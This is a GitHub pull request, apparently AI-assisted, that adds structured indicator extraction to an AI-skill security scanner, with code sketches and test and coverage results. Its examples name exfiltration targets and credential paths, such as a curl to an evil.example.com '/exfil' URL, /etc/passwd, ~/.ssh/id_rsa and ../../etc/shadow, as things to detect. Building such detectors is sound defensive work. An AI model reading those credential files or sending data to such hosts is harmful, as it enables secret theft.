feat(ml): structured indicator extraction (Item C) by kurtpayne · Pull Request #208 · kurtpayne/skillscan-security

kurtpayne · 2026-04-26T22:44:39Z

Summary

Item C of the post-v4.7 pivot. Replaces `affected_lines: [12]` with `indicators: [{type, value, line}]` so output goes from "look at line 12" to "look at the curl-to-evil.example.com on line 12."

Adds:

`Indicator` — pydantic model in `models.py` (type / value / line / evidence)
`Finding.indicators` — new optional `list[Indicator]` field, default `[]` (backward-compatible)
`skillscan.indicators` — regex-based extractor module
`extract_indicators()` — wired into `ml_detector.py` (runs once per file, attached to every label-specific `PINJ-ML-001` Finding for that file)

No model retraining needed. Pure post-process at inference time.
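A minimal sketch of the shape described above. It uses stdlib dataclasses as a stand-in for the pydantic models so it runs without dependencies. The field types and the `id` field on `Finding` are assumptions; the PR only names `type`, `value`, `line`, and `evidence`.

```python
from dataclasses import asdict, dataclass, field
from typing import List, Optional


@dataclass
class Indicator:
    type: str                       # e.g. "url", "cve", "ip", "domain", "package", "file_path"
    value: str                      # the extracted text
    line: Optional[int] = None      # assumed optional; line where the value was found
    evidence: Optional[str] = None  # assumed optional; surrounding text


@dataclass
class Finding:
    id: str  # hypothetical field, for illustration only
    # Defaults to an empty list, so code that never sets indicators keeps working.
    indicators: List[Indicator] = field(default_factory=list)


legacy = Finding(id="PINJ-ML-001")
enriched = Finding(
    id="PINJ-ML-001",
    indicators=[
        Indicator(
            type="url",
            value="https://evil.example.com/exfil",
            line=12,
            evidence="curl https://evil.example.com/exfil",
        )
    ],
)
```

Because the default is built with `default_factory`, each `Finding` gets its own empty list rather than sharing one mutable default.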

Indicator types

| type | source | example |
| --- | --- | --- |
| `url` | http(s) URLs in skill text | `https://evil.example.com/exfil` |
| `cve` | skill text + `reasoning` | `CVE-2026-12345` |
| `ip` | IPv4 dotted-quad with octet validation | `192.168.1.100` |
| `domain` | bare hostnames (excluding URL hosts and parent dupes) | `malicious-site.io` |
| `package` | npm scoped + pip/npm/yarn/pnpm install lines | `@evil/payload`, `requests==2.31.0` |
| `file_path` | /etc, /var, /tmp, /usr, /root paths; traversal; ~/.dotfile; Windows | `/etc/passwd`, `~/.ssh/id_rsa`, `../../etc/shadow` |
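To make two of the rows concrete, here is a hedged sketch of what CVE and IPv4 extraction with octet validation might look like. The patterns and function names are illustrative assumptions, not the contents of `skillscan.indicators`. The CVE digit range follows the `CVE-YYYY-NNNN[NNN]` form and the localhost noise floor (127.x, 0.0.0.0) follows the commit message.

```python
import re

# CVE-YYYY-NNNN with up to three extra digits.
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,7}\b")

# Four dot-separated groups, not embedded in a longer dotted number.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def find_cves(text: str) -> list:
    """Return the distinct CVE identifiers in text, sorted."""
    return sorted(set(CVE_RE.findall(text)))


def find_ipv4(text: str) -> list:
    """Return (address, line_number) pairs for valid, non-localhost IPv4 addresses."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in IPV4_RE.finditer(line):
            value = match.group(0)
            octets = value.split(".")
            if any(int(octet) > 255 for octet in octets):
                continue  # octet validation: 999.1.1.1 is not an address
            if octets[0] == "127" or value == "0.0.0.0":
                continue  # localhost noise floor
            hits.append((value, lineno))
    return hits


sample = (
    "curl http://192.168.1.100/x\n"
    "bind 127.0.0.1\n"
    "pin 999.1.1.1\n"
    "see CVE-2026-12345 and CVE-2026-12345\n"
)
cves = find_cves(sample)
ips = find_ipv4(sample)
```

On this sample, only `192.168.1.100` on line 1 survives the IPv4 filters, and the repeated CVE is reported once.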

Conservative posture

30-entry common-domain noise floor (github, npm, pypi, anthropic, …): bare-domain matches against these entries are dropped
Lookbehind blocks parent-domain duplicates (`nist.gov` inside `nvd.nist.gov` is suppressed)
URL terminator-aware: shell substitution `$(...)` and backticks don't get absorbed
Hard cap of 50 indicators per finding
Extractor wrapped in try/except — a regex bug never breaks the scanner
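The URL and domain rules above can be sketched roughly as follows. This is an illustration under stated assumptions, not the PR's code: the regexes are simplified, `NOISE_DOMAINS` is a made-up four-entry subset (the actual 30 entries are not listed here), and treating subdomains of a noise entry as noise is also an assumption.

```python
import re

MAX_INDICATORS = 50  # hard cap per finding, as stated in the PR

# Illustrative subset only; the real list has 30 entries.
NOISE_DOMAINS = {"github.com", "npmjs.com", "pypi.org", "anthropic.com"}

# Stop at whitespace, quotes, angle brackets, backticks, "$" and parentheses,
# so `$(...)` substitutions and backtick spans are not absorbed into the URL.
URL_RE = re.compile(r"https?://[^\s\"'<>`$()]+")

# The lookbehind refuses to start a match in the middle of a longer hostname.
DOMAIN_RE = re.compile(r"(?<![\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def is_noise(domain: str) -> bool:
    d = domain.lower()
    return any(d == n or d.endswith("." + n) for n in NOISE_DOMAINS)


def extract_urls_and_domains(text: str) -> list:
    """Return ordered, de-duplicated (type, value) pairs, capped at MAX_INDICATORS."""
    found = [("url", url) for url in URL_RE.findall(text)]
    # Blank out URLs so their hosts are not reported again as bare domains.
    remaining = URL_RE.sub(" ", text)
    for match in DOMAIN_RE.finditer(remaining):
        if not is_noise(match.group(0)):
            found.append(("domain", match.group(0).lower()))
    unique = list(dict.fromkeys(found))  # de-duplicate, keep first-seen order
    return unique[:MAX_INDICATORS]


sample = (
    "curl https://evil.example.com/exfil?d=$(cat /etc/passwd)\n"
    "ping malicious-site.io\n"
    "clone from github.com\n"
    "see nvd.nist.gov\n"
)
result = extract_urls_and_domains(sample)
```

A pattern this loose would also match file names such as `script.py`, which is one reason a conservative extractor needs stricter rules than this sketch shows.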

Test plan

`SKILLSCAN_NO_USER_RULES=1 pytest tests/test_indicators.py -v` — 25/25 passing
Full suite (excluding 7 stale-rule tests already fixed by #204, "test: align test_rules.py with rules-snapshot at 2026.04.25 (unblocks main)"): 738 passed, 8 skipped
`ruff format` + `ruff check` — clean on all touched files
Manual smoke against the bundled v4 GGUF on a few held-out files

Compatibility

Strictly additive: `Finding.indicators` defaults to `[]`. Existing JSON / SARIF / JUnit consumers see an empty list (or the field omitted depending on serialization) and behave unchanged. Older clients that don't know about the field will simply ignore it.
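For consumers that want to start reading the new field while still accepting older output, a tolerant reader might look like the sketch below. The JSON layout and the `id` key are assumptions for illustration; only the `indicators` field and its `type` / `value` / `line` members come from this PR.

```python
import json


def describe(finding_json: str) -> str:
    """Summarize one finding, whether or not it carries indicators."""
    finding = json.loads(finding_json)
    # Covers a missing field, an explicit null, and an empty list.
    indicators = finding.get("indicators") or []
    if not indicators:
        return f"{finding['id']}: no indicators"
    parts = [f"{i['type']} {i['value']} (line {i.get('line')})" for i in indicators]
    return f"{finding['id']}: " + "; ".join(parts)


old_payload = '{"id": "PINJ-ML-001"}'
empty_payload = '{"id": "PINJ-ML-001", "indicators": []}'
new_payload = json.dumps(
    {
        "id": "PINJ-ML-001",
        "indicators": [
            {"type": "url", "value": "https://evil.example.com/exfil", "line": 12}
        ],
    }
)
```

All three payloads pass through the same code path, which is the behavior the compatibility note relies on.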

🤖 Generated with Claude Code

codecov · 2026-04-26T23:00:46Z

Codecov Report

❌ Patch coverage is 93.37017% with 12 lines in your changes missing coverage. Please review.
✅ Project coverage is 76.38%. Comparing base (f72c00e) to head (b80716e).
⚠️ Report is 2 commits behind head on main.

| Files with missing lines | Patch % | Lines |
| --- | --- | --- |
| src/skillscan/indicators.py | 94.67% | 9 Missing ⚠️ |
| src/skillscan/ml_detector.py | 50.00% | 3 Missing ⚠️ |

Additional details and impacted files

@@            Coverage Diff             @@
##             main     #208      +/-   ##
==========================================
+ Coverage   75.87%   76.38%   +0.51%     
==========================================
  Files          41       42       +1     
  Lines        5994     6175     +181     
==========================================
+ Hits         4548     4717     +169     
- Misses       1446     1458      +12


Item C of the post-v4.7 pivot. Replaces "look at line 12" with "look at the curl to evil.example.com on line 12" by post-processing the model's output (no retraining required).

Adds:

- skillscan.models.Indicator: pydantic model with type/value/line/evidence
- skillscan.models.Finding.indicators: new optional list field (default [], backward-compatible with all existing consumers)
- skillscan.indicators: extractor module with regex-based extractors for 6 indicator types:
  - url: http(s) URLs (terminator-aware: shell substitution $(...) and backticks don't get absorbed)
  - cve: CVE-YYYY-NNNN[NNN], also extracted from `reasoning` text (model often cites CVEs not in skill body)
  - ip: IPv4 dotted-quad with octet validation; localhost noise floor (127.x, 0.0.0.0)
  - domain: bare hostnames not already surfaced by URL extractor; lookbehind blocks parent-domain dupes (`nist.gov` inside `nvd.nist.gov`); 30-entry common-domain noise floor (github, npm, pypi, anthropic, ...)
  - package: npm scoped (@scope/name) anywhere; pip/npm/yarn/pnpm install command line capture (multi-package)
  - file_path: /etc, /var, /tmp, /usr, /root system paths; ../../traversal; ~/.dotfiles; Windows C:\
- 25 unit tests covering each extractor and a realistic-skill integration
- Wiring in ml_detector.py: extract_indicators() runs once per file and the same list is attached to each label-specific Finding produced. Wrapped in try/except, so an extractor failure never breaks the scanner.

Conservative posture: when in doubt, drop. False indicators are worse than missing ones because they give downstream tooling bad targets to act on. Cap is 50 indicators per finding.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
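The wiring described in this commit message (extract once per file, attach the result to every finding, never let an extractor error escape) could look roughly like this. `attach_indicators`, the dict-based findings, and the two example extractors are hypothetical stand-ins, not the code in `ml_detector.py`.

```python
from typing import Callable, Dict, List


def attach_indicators(
    findings: List[Dict],
    text: str,
    extractor: Callable[[str], List[Dict]],
    cap: int = 50,
) -> List[Dict]:
    """Run the extractor once for the file and attach the result to each finding."""
    try:
        indicators = extractor(text)[:cap]
    except Exception:
        # An extractor bug degrades to "no indicators" instead of failing the scan.
        indicators = []
    for finding in findings:
        # Each finding gets its own copy; this is a choice made by this sketch.
        finding["indicators"] = list(indicators)
    return findings


def broken_extractor(text: str) -> List[Dict]:
    raise ValueError("simulated regex bug")


def working_extractor(text: str) -> List[Dict]:
    return [{"type": "cve", "value": "CVE-2026-12345", "line": 1}]


labels = [{"id": "PINJ-ML-001", "label": "a"}, {"id": "PINJ-ML-001", "label": "b"}]
safe = attach_indicators([dict(f) for f in labels], "text", broken_extractor)
full = attach_indicators([dict(f) for f in labels], "text", working_extractor)
```

Catching the broad `Exception` here is deliberate: the indicators are an enrichment, so losing them is preferable to losing the findings themselves.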

kurtpayne mentioned this pull request Apr 26, 2026

feat(scan): defense-in-depth triage hints (Item E) #211

Open

4 tasks

kurtpayne force-pushed the feat/ml-indicators branch from 05625f8 to b80716e on April 27, 2026 00:09

kurtpayne wants to merge 1 commit into main from feat/ml-indicators
